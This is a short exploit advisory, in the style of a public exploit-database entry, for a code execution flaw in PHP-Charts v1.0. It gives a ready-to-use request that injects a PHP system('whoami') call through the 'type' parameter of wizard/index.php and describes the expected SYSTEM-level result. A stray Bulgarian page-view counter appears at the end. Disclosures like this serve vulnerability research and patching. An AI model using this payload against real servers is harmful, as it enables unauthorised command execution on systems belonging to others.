# Exploit Title: PHP-CHARTS v1.0 code execution vulnerability # Date: 05/15/2013 # Exploit Author: fizzle stick # Vendor Homepage: http://php-charts.com/ # Software Link: http://php-charts.com/downloads/php-chart_v1.0.zip # Version: v1.0 # Tested on: Windows Summary: PHP-charts v1.0 suffers from a code execution vulerability in the index.php page Exploit: http://192.168.1.120/phpcharts/wizard/index.php?type=';system('whoami');// Result: If vulnerable the web service context will be displayed, usually SYSTEM. ;D ####Брой прочитания на тази страница: 1063
php-Charts 1.0 – Code Execution Vulnerability